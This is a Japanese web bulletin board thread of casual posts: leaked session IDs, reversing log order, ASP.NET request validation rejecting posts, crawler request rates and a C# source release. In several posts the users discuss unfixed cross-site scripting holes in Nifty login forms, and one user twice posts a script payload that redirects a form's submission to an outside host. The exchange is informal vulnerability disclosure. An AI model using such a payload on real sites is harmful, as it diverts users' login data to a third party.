新生鳩丸掲示板♯

>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

>　うおっと。

>　とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。

パスワードってどうやって変更するのだっけ。

>話題「**」を含むえび日記（に限らず、過去ログというもの全般にいえることですが）は、記事の順番が逆（古いものから新しいものへ）の方が読みやすいと思うのですが、いかがでしょうか。

　あー、そうかも知れません。

　ということで逆にしてみました。

話題「**」を含むえび日記（に限らず、過去ログというもの全般にいえることですが）は、記事の順番が逆（古いものから新しいものへ）の方が読みやすいと思うのですが、いかがでしょうか。

>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

　うおっと。

　とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。

私のじゃないやつって、僕のかも。

セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。

念のためパスワード変更しておこっと。

>で、結局まだ沢山残ってるんですね？

　実は私はあんまり調べてないのですが、office さんがそれなりに精力的に調査してくださったようで、3ヶ所ほど発見されています。いずれも未修整で、うち一つは SSL 保護つきのログインフォームです。先日の DOM 使用例はそこできっちり動作しました。

　これについてニフティが把握しているかどうかは分かりません。全フォームについて調査していると思うので、気づくだろうとは思うのですが……。

いやいや、明快、明快、実に解りやすい。

で、結局まだ沢山残ってるんですね？

といっても28日までにまだ2.5日ありますが。う～ん、おまけして７月までにと延ばしてあげましょう。NIFTYさん。

"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span

>>なぜかここに投稿しようとするとエラーになるので

　調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。

================

危険な可能性のある Request.Form 値がクライアントから検出されました。

説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。

例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。

================

　この機能はオフにできるはずなので、ちょっと調べてみます。

>なぜかここに投稿しようとするとエラーになるので

　どんなエラーが出ていましたか？

　実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。

なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。

http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351

なんかタグを含む投稿で? エラーになります。再挑戦

"&gt;&lt;script&gt;document.forms[0].action="http://altba.com";document.forms[0].method="get"&lt;/script&gt;&lt;span

test

> 取りに来るのは良いのですが、同じリソースを何度もゼロ間隔でというのはちょっと。たぶんアンテナに登録しているユーザの数だけリクエストしているのだろうと思いますが、一回にまとまらないのかしら。

特許対策かもしれません【謎】。

http://slashdot.jp/articles/03/06/23/2021235.shtml?topic=54

ていうかこの特許のせいで今後20年全世界のサーバに迷惑がかかりっぱなしとかなったらイヤすぎなんですが実施例はないんでしょうか。wgetとか。

とりあえず巡回ツール自身は更新日時を調べずIMSでサーバ任せにする分には問題なさげですが【調べずにカキコ】。

やりすぎというか、やられすぎというか(謎)。

XSSって怖いですね(ベタ)。

　お褒めにあずかり光栄ですが、実は私はこの件ではニフティにクレームなど入れていないのです。それどころか、この件についてはニフティからのコンタクトもなくて、やりとり皆無です。

#まあニフティとしても、フォーラム部ウザイからコンタクトするの嫌だ、なんて断言している人間とコンタクト取りたくないでしょうけれど……。

　そんなわけで、全ては「善意ある方」とそのお仲間(?)の働きによるものです。もうちょっと具体的に言うと、例の記事が言う「一部のフォーラムマネジャー」の方々の功績です。

　ところで sagamiさんのって、紙袋をノブにという話ですか？

>御意【謎】。

>ハイパーさ【謎】に欠けたのだと思われます【謎】。

記録を掘り返してみたら、URLじゃなかった。

正直、スマンカッタ

なにはともあれ、私に現実的な影響を与えるクレーマーとしては

sagami さんとツートップを構成しているということの、証左と

いえましょう。素晴らしい :-)

>ソース公開希望。

　公開してみました。

http://altba.com/bakera/downloads/hatomarudll-2003-06-24.zip

>C#はよくわからないという罠がありますがきっと別途定める親切な方【誰】がツッコミを入れてくれるでしょう【謎】。

　これがまたかなりダサいソースなので C# が分かる人でも辛いかも知れません。各クラスの説明とかも無いので、本気で理解不可能かも。

　実は自分でも辛かったりします。何しろ正真正銘の初心者な上、ちゃんと勉強したわけでもないので書き方の流儀とかさっぱり分からずテキトーに進めてきた結果がこれです。

　というわけで、ソースを見て卒倒しないでください。

　ってどこかで聞いたフレーズですが。

>ところで【謎】用語にはコメントを付けられないのでしょうか。ていうか付けたい【謎】。

　つけられるようになりました……したつもりです。

　バグっていたらごめんなさい。